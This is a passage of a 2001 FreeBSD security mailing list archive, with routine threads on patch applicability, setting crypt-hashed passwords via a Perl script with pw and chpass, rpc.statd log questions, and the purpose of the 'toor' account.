send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 6721837B401 for ; Wed, 6 Jun 2001 09:31:17 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 19A6F671A4; Wed, 6 Jun 2001 09:31:17 -0700 (PDT) Date: Wed, 6 Jun 2001 09:31:16 -0700 From: Kris Kennaway To: Christopher Schulte Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts Message-ID: <20010606093116.C15460@xor.obsecurity.org> References: <200106051808.f55I8ik15444@freefall.freebsd.org> <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Izn7cH1Com+I3R9J" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.0.14.0.20010605135437.0278eeb0@pop.schulte.org>; from christopher@schulte.org on Tue, Jun 05, 2001 at 02:02:45PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --Izn7cH1Com+I3R9J Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jun 05, 2001 at 02:02:45PM -0500, Christopher Schulte wrote: > At 11:08 AM 6/5/2001 -0700, you wrote: > >This patch has been verified to apply to FreeBSD 4.3-RELEASE and > >4.2-RELEASE; it may or may not apply to older, unsupported versions of > >FreeBSD. >=20 > Can someone comment on the impact of applying this patch to a 4.2-STABLE= =20 > environment? One might assume since 4.2-S falls between 4.2-R and 4.3-R,= =20 > it would work? Not necessarily; we only support releases because it's too hard to make patches for every possible intermediate version. It turns out in this case the patch didn't even apply to 4.2-REL (needed a minor tweak) although I thought I tested it. Kris --Izn7cH1Com+I3R9J Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7HlrUWry0BWjoQKURAltfAJ0RRXWKyNFwx65KOW+0em1cp2zOxgCgjU89 +z80iK4ATHb4TkzRxRYhIKU= =4L6O -----END PGP SIGNATURE----- --Izn7cH1Com+I3R9J-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 337E937B40A for ; Wed, 6 Jun 2001 09:31:33 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56MqdB08480; Thu, 7 Jun 2001 05:52:39 +0700 (ICT) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id XAA02279; Wed, 6 Jun 2001 23:31:27 +0700 (ICT) Date: Wed, 6 Jun 2001 23:31:27 +0700 (ICT) Message-Id: <200106061631.XAA02279@bazooka.cs.ait.ac.th> To: david@slis-two.lis.fsu.edu Cc: freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:22:06 -0400 (EDT)) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >It appears that what is being passed by the crypt function is not what is >making it into the passwd file. At a SWAG. Sound weird. Does it works when you call it by hand? Does it works with a password that contains only alphanumeric characters? I wonder if crypt in Perl corresponds to crypt(3). There must b some reason somewhere... Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:31:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-165-226-243.dsl.lsan03.pacbell.net [64.165.226.243]) by hub.freebsd.org (Postfix) with ESMTP id 602E937B401 for ; Wed, 6 Jun 2001 09:31:45 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 1DB15671A4; Wed, 6 Jun 2001 09:31:45 -0700 (PDT) Date: Wed, 6 Jun 2001 09:31:45 -0700 From: Kris Kennaway To: Vladimir Savichev Cc: mikes@ct980320-b.blmngtn1.in.home.com, freebsd-security@freebsd.org Subject: Re: rpc.statd attack before ipfw activated Message-ID: <20010606093144.D15460@xor.obsecurity.org> References: <20010605174214.J90423-100000@ariel.phys.wesleyan.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="HWvPVVuAAfuRc6SZ" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010605174214.J90423-100000@ariel.phys.wesleyan.edu>; from vlad@ariel.phys.wesleyan.edu on Tue, Jun 05, 2001 at 05:55:03PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --HWvPVVuAAfuRc6SZ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jun 05, 2001 at 05:55:03PM -0400, Vladimir Savichev wrote: > how interesting. I'm here on > FreeBSD ariel.phys.wesleyan.edu 4.3-STABLE FreeBSD 4.3-STABLE #2: Sun Jun > 3 21:23:38 EDT 20 01 > root@ariel.phys.wesleyan.edu:/usr/obj/usr/src/sys/ARIEL i386 > I got pretty much similar log several times > for a last couple of days, was wondering > what the hell rpc is doing. Could you point me where I can > read more about. How can I log call hosts. See the archives; this comes up several times a week. Kris --HWvPVVuAAfuRc6SZ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7HlrwWry0BWjoQKURAtVUAKDvjY6ycTcGgpjmjpxy3owkxvd3FACdHzdQ Ee8Ecwv6Osx52oqGH8V2jPs= =QqBo -----END PGP SIGNATURE----- --HWvPVVuAAfuRc6SZ-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:34: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from cartman.techsupport.co.uk (cabletel1.cableol.net [194.168.3.4]) by hub.freebsd.org (Postfix) with ESMTP id 0A48D37B401 for ; Wed, 6 Jun 2001 09:34:02 -0700 (PDT) (envelope-from ceri@techsupport.co.uk) Received: from ceri by cartman.techsupport.co.uk with local (Exim 3.22 #2) id 157gHB-0006Ln-00; Wed, 06 Jun 2001 17:35:21 +0100 Date: Wed, 6 Jun 2001 17:35:21 +0100 From: Ceri To: Olivier Nicole Cc: david@slis-two.lis.fsu.edu, freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010606173521.A23780@cartman.techsupport.co.uk> References: <200106061631.XAA02279@bazooka.cs.ait.ac.th> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106061631.XAA02279@bazooka.cs.ait.ac.th>; from Olivier.Nicole@ait.ac.th on Wed, Jun 06, 2001 at 11:31:27PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 11:31:27PM +0700, Olivier Nicole said: > > I wonder if crypt in Perl corresponds to crypt(3). There must b some > reason somewhere... Yeah, of course it does : setantae@shaft setantae$ perldoc -f crypt crypt PLAINTEXT,SALT Encrypts a string exactly like the crypt(3) function in the C library (assuming that you actually have a version there that has not been extirpated as a potential munition). This can prove useful for checking the password file for lousy passwords, amongst other things. Only the guys wearing white hats should do this Ceri -- I probably wouldn't like you. Really. I really probably wouldn't like you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:37: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id D371037B403 for ; Wed, 6 Jun 2001 09:36:59 -0700 (PDT) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f56Mx9B08529; Thu, 7 Jun 2001 05:59:09 +0700 (ICT) From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id XAA02297; Wed, 6 Jun 2001 23:36:55 +0700 (ICT) Date: Wed, 6 Jun 2001 23:36:55 +0700 (ICT) Message-Id: <200106061636.XAA02297@bazooka.cs.ait.ac.th> To: ceri@techsupport.co.uk Cc: freebsd-security@FreeBSD.ORG In-reply-to: <20010606173521.A23780@cartman.techsupport.co.uk> (message from Ceri on Wed, 6 Jun 2001 17:35:21 +0100) Subject: Re: Encrypted passwords Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > I wonder if crypt in Perl corresponds to crypt(3). There must b some > > reason somewhere... > > Yeah, of course it does : > > setantae@shaft setantae$ perldoc -f crypt > crypt PLAINTEXT,SALT I'd assume it does, but I know I would check it anyway :) Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:54:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id F3B4C37B408 for ; Wed, 6 Jun 2001 09:54:17 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id MAA19725; Wed, 6 Jun 2001 12:54:00 -0400 (EDT) (envelope-from str) Date: Wed, 6 Jun 2001 12:54:00 -0400 (EDT) From: Igor Roshchin Message-Id: <200106061654.MAA19725@giganda.komkon.org> To: kris@obsecurity.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts Cc: security@freebsd.org In-Reply-To: <20010606093116.C15460@xor.obsecurity.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris, It looks like 01:49 advisory was not sent to FreeBSD-security or -security-notifications mailing lists. I looked in the archives, and it is not there either. I found it in freebsd-announce though. Did the policy of where those advisories are sentchange ? Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 9:56:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id A08CB37B407 for ; Wed, 6 Jun 2001 09:56:49 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56GwQ451593; Wed, 6 Jun 2001 12:58:26 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 12:58:26 -0400 (EDT) From: David Miner To: Olivier Nicole Cc: , Subject: Re: Encrypted passwords In-Reply-To: <200106061636.XAA02297@bazooka.cs.ait.ac.th> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Olivier Nicole wrote: > > > I wonder if crypt in Perl corresponds to crypt(3). There must b some > > > reason somewhere... > > > > Yeah, of course it does : > > > > setantae@shaft setantae$ perldoc -f crypt > > crypt PLAINTEXT,SALT > > > I'd assume it does, but I know I would check it anyway :) > > Olivier > If I knew how. My "inspiration" for this was a series of messages back on May 2nd. This is the main one I used for my example: Date: Wed, 2 May 2001 17:58:50 +0200 From: Andrzej Groth To: freebsd-security@FreeBSD.ORG Subject: Re: useradd/adduser On Wed, 02 May 2001, Peter Pentchev wrote: > On Wed, May 02, 2001 at 06:02:57PM +0300, Peter Pentchev wrote: > > On Wed, May 02, 2001 at 03:59:50PM +0100, Lee Smallbone wrote: > > > I see what you mean about the synopsis...! > > > > > > From what I can see it isn't possible to supply the password to pw? > > > I'm using md5 passwords, and can easily have the script in question encode > > > the password prior to calling pw, so is it possible to use (in the verse of > > > pw), something along the lines of: > > > > > > pw useradd -n test -c "Test User" -d /home2/test -m -s sh $md5encpass > > > > > > ? so... pw useradd -n test -c "Test User" -d /home2/test -s /bin/sh; chpass -p $md5encpass test ? ;-) br. -- Andrzej Groth I changed it to a system call from perl and went on. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 11:35:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from surf.iae.nl (surf.iae.nl [212.61.20.2]) by hub.freebsd.org (Postfix) with ESMTP id 0D6B237B409 for ; Wed, 6 Jun 2001 11:35:46 -0700 (PDT) (envelope-from ascheepe@iae.nl) Received: by surf.iae.nl (Postfix, from userid 22499) id 75FDFBFD1F; Wed, 6 Jun 2001 20:07:24 +0200 (CEST) Date: Wed, 6 Jun 2001 20:07:23 +0200 From: Axel Scheepers To: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010606200723.A73395@surf.iae.nl> References: <200106061636.XAA02297@bazooka.cs.ait.ac.th> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from david@slis-two.lis.fsu.edu on Wed, Jun 06, 2001 at 12:58:26PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Really weird, I made a small mistake the other day which resulted in plaintext passwords in the password database. I ran the db trough perl using the crypt function to generate the passwords and everything was ok again ... How many characters are in the enc. pw field ? There should be 13. Hope this helps in a way .. Gr, Axel On Wed, Jun 06, 2001 at 12:58:26PM -0400, David Miner wrote: > On Wed, 6 Jun 2001, Olivier Nicole wrote: > > > > > I wonder if crypt in Perl corresponds to crypt(3). There must b some > > > > reason somewhere... > > > > > > Yeah, of course it does : > > > > > > setantae@shaft setantae$ perldoc -f crypt > > > crypt PLAINTEXT,SALT > > > > > > I'd assume it does, but I know I would check it anyway :) > > > > Olivier > > > If I knew how. > > My "inspiration" for this was a series of messages back on May 2nd. > > This is the main one I used for my example: > > Date: Wed, 2 May 2001 17:58:50 +0200 > From: Andrzej Groth > To: freebsd-security@FreeBSD.ORG > Subject: Re: useradd/adduser > > On Wed, 02 May 2001, Peter Pentchev wrote: > > > On Wed, May 02, 2001 at 06:02:57PM +0300, Peter Pentchev wrote: > > > On Wed, May 02, 2001 at 03:59:50PM +0100, Lee Smallbone wrote: > > > > I see what you mean about the synopsis...! > > > > > > > > From what I can see it isn't possible to supply the password to pw? > > > > I'm using md5 passwords, and can easily have the script in question > encode > > > > the password prior to calling pw, so is it possible to use (in the > verse > of > > > > pw), something along the lines of: > > > > > > > > pw useradd -n test -c "Test User" -d /home2/test -m -s sh > $md5encpass > > > > > > > > ? > > so... > pw useradd -n test -c "Test User" -d /home2/test -s /bin/sh; chpass -p > $md5encpass test > > ? ;-) > > br. > -- > Andrzej Groth > > > I changed it to a system call from perl and went on. > > David > --------------------------------------------------------------------- > David R. Miner miner@lis.fsu.edu > Systems Integrator voice: 850-644-8107 > School of Information Studies fax: 850-644-6253 > Florida State University > Tallahassee, FL 32306-2100 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Met vriendelijke groet, VIA NET.WORKS Nederland Axel Scheepers Operations phone +31 40 239 33 93 fax +31 40 239 33 11 e-mail eindhoven.beheer@vianetworks.nl http://www.vianetworks.nl/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 11:58:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id A2FE937B401 for ; Wed, 6 Jun 2001 11:58:18 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 4633 invoked by uid 1000); 6 Jun 2001 18:57:04 -0000 Date: Wed, 6 Jun 2001 21:57:04 +0300 From: Peter Pentchev To: Axel Scheepers Cc: freebsd-security@FreeBSD.ORG Subject: Re: Encrypted passwords Message-ID: <20010606215704.G1104@ringworld.oblivion.bg> Mail-Followup-To: Axel Scheepers , freebsd-security@FreeBSD.ORG References: <200106061636.XAA02297@bazooka.cs.ait.ac.th> <20010606200723.A73395@surf.iae.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010606200723.A73395@surf.iae.nl>; from ascheepe@surf.iae.nl on Wed, Jun 06, 2001 at 08:07:23PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 08:07:23PM +0200, Axel Scheepers wrote: > Really weird, > I made a small mistake the other day which resulted in plaintext passwords in the > password database. I ran the db trough perl using the crypt function to generate > the passwords and everything was ok again ... > How many characters are in the enc. pw field ? There should be 13. 13 in case of DES, quite a lot more in case of MD5. G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 12:20:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from slis-two.lis.fsu.edu (slis-two.lis.fsu.edu [128.186.72.102]) by hub.freebsd.org (Postfix) with ESMTP id 8C17A37B406 for ; Wed, 6 Jun 2001 12:20:42 -0700 (PDT) (envelope-from david@slis-two.lis.fsu.edu) Received: from localhost (david@localhost) by slis-two.lis.fsu.edu (8.11.1/8.11.1) with ESMTP id f56JMMf53225; Wed, 6 Jun 2001 15:22:22 -0400 (EDT) (envelope-from david@slis-two.lis.fsu.edu) Date: Wed, 6 Jun 2001 15:22:22 -0400 (EDT) From: David Miner To: Axel Scheepers Cc: Subject: Re: Encrypted passwords In-Reply-To: <20010606200723.A73395@surf.iae.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001, Axel Scheepers wrote: > Really weird, > I made a small mistake the other day which resulted in plaintext passwords in the > password database. I ran the db trough perl using the crypt function to generate > the passwords and everything was ok again ... > How many characters are inthe enc. pw field ? There should be 13. > > Hope this helps in a way .. > Gr, > Axel > Just tried again and looked with vipw. They are 13 characters long. David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Integrator voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 6 19: 0:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.cs.ait.ac.th (mail.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id D1FFA37B403 for ; Wed, 6 Jun 2001 19:00:04 -0700 (PDT) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by mail.cs.ait.ac.th (8.11.3/8.9.3) with ESMTP id f57A8mB10196; Thu, 7 Jun 2001 17:08:49 +0700 (ICT) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id IAA25340; Thu, 7 Jun 2001 08:59:56 +0700 (ICT) Date: Thu, 7 Jun 2001 08:59:56 +0700 (ICT) Message-Id: <200106070159.IAA25340@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: david@slis-two.lis.fsu.edu Cc: freebsd-security@FreeBSD.ORG In-reply-to: (message from David Miner on Wed, 6 Jun 2001 12:58:26 -0400 (EDT)) Subject: Re: Encrypted passwords References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org David, >I changed it to a system call from perl and went on. As a first step I would try to make sure the system call is what I really want: replace system' with print' and carefull check for any strange character. I'd be specially suspicious about the contents of that variable that holds the password. Second I would consider that the system call is made under bourne shell, it may have a different environment than the shell you use for every day work, and it may simply be missing some environment variable. I understood you run the scrip as root, it is not a setuid script? Else you'd need to untaint the variables. As a last resort, I'd copy the script, remove all the fancy interface and keep onlythe system call. Try to split it, add some print, some pw usershow, etc. Is your system running NIS? It could be a problem that the new user has not yet propagated through NIS and then the password cannot be set... Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 2:58:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id CB7BD37B403 for ; Thu, 7 Jun 2001 02:58:16 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f57B5xl19493 for ; Thu, 7 Jun 2001 04:06:00 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Thu, 7 Jun 2001 04:05:59 -0700 (PDT) From: mudman To: Subject: root & toor Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What is the user "toor" for? I suspect it is a security implementation somehow based on the reversed spelling of "root," but its detailed significance is not known to me. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 3: 1:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.tecc.co.uk (luggage.tecc.co.uk [193.128.6.129]) by hub.freebsd.org (Postfix) with SMTP id 587D137B403 for ; Thu, 7 Jun 2001 03:01:29 -0700 (PDT) (envelope-from andy@tecc.co.uk) Received: from fw-smtp.tecc.co.uk [195.217.37.39] by relay.tecc.co.uk with esmtp (Exim 1.70 #1) id 157wbX-0002QQ-00; Thu, 7 Jun 2001 11:01:27 +0100 Received: from [195.217.37.155] (helo=southampton) by fw-smtp.tecc.co.uk with smtp (Exim 2.12 #3) id 157wbX-000795-00; Thu, 7 Jun 2001 11:01:27 +0100 From: "Andy [Tecc Nops]" To: "mudman" , Subject: RE: root & toor Date: Thu, 7 Jun 2001 11:01:27 +0100 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 In-Reply-To: Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org http://www.freebsd.org/cgi/getmsg.cgi?fetch=1805198+0+/usr/local/www/db/text /2000/freebsd-questions/20000319.freebsd-questions Regards Ak > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of mudman > Sent: 07 June 2001 12:06 > To: freebsd-security@freebsd.org > Subject: root & toor > > > > What is the user "toor" for? I suspect it is a security implementation > somehow based on the reversed spelling of "root," but its detailed > significance is not known to me. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 3: 3:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from axis.tdd.lt (axis.tdd.lt [213.197.128.94]) by hub.freebsd.org (Postfix) with ESMTP id 31B1837B403 for ; Thu, 7 Jun 2001 03:03:21 -0700 (PDT) (envelope-from domas.mituzas@delfi.lt) Received: from localhost (midom@localhost) by axis.tdd.lt (8.11.3/8.11.1) with ESMTP id f57A39m30460; Thu, 7 Jun 2001 10:03:09 GMT X-Authentication-Warning: axis.tdd.lt: midom owned process doing -bs Date: Thu, 7 Jun 2001 10:03:09 +0000 (GMT) From: Domas Mituzas X-X-Sender: To: mudman Cc: Subject: Re: root & toor In-Reply-To: Message-ID: <20010607100241.N30276-100000@axis.tdd.lt> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > What is the user "toor" for? I suspect it is a security implementation > somehow based on the reversed spelling of "root," but its detailed > significance is not known to me. toor has bourne shell, root has C shell. the only difference, afaik. Regards, Domas Mituzas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 6:29:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from public.guangzhou.gd.cn (mail2-smtp.guangzhou.gd.cn [202.105.65.222]) by hub.freebsd.org (Postfix) with SMTP id 2A0D337B406 for ; Thu, 7 Jun 2001 06:29:17 -0700 (PDT) (envelope-from huacheng@public.guangzhou.gd.cn) Received: from slack([211.95.229.139]) by public.guangzhou.gd.cn(JetMail 2.5.3.0) with SMTP id jm03b1fbcdd; Thu, 7 Jun 2001 13:27:20 -0000 Message-ID: <009e01c0ef55$da422340$9201a8c0@home.net> From: "edwin chan" To: "David Miner" , "Olivier Nicole" Cc: References: Subject: Re: Encrypted passwords Date: Thu, 7 Jun 2001 21:28:21 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think that : you have a user list, and you can make a random password for them, then you can use "expect" and " passwd user" do your jobs and don't worry how chpass works. ----- Original Message ----- From: David Miner To: Olivier Nicole Cc: Sent: Thursday, June 07, 2001 12:22 AM Subject: Re: Encrypted passwords > On Wed, 6 Jun 2001, Olivier Nicole wrote: > > > >But when I encrypt them and put them in the passwd file, they do not allow > > >the user to log in.I have to use the passwd program to manually change > > >them to the same password that I wanted originally.Thus I believe the > > >problem lies in the encryption method or how it is being passwd to the > > >chpass program. > > > > Hummm, I think nowdays passwords are not kept in a plain file but in a > > .db file. Can't it be the problem? > > > > Olivier > > > No, the chpass function takes care calling mk-pwd and putting them in the > .db file. Otherwise nothing would be there when I look at it with vipw. > > It appears that what is being passed by the crypt function is not what is > making it into the passwd file. At a SWAG. > > David > --------------------------------------------------------------------- > David R. Miner miner@lis.fsu.edu > Systems Integrator voice: 850-644-8107 > School of Information Studies fax: 850-644-6253 > Florida State University > Tallahassee, FL 32306-2100 > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 7: 0:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 3872237B405 for ; Thu, 7 Jun 2001 07:00:04 -0700 (PDT) (envelope-from 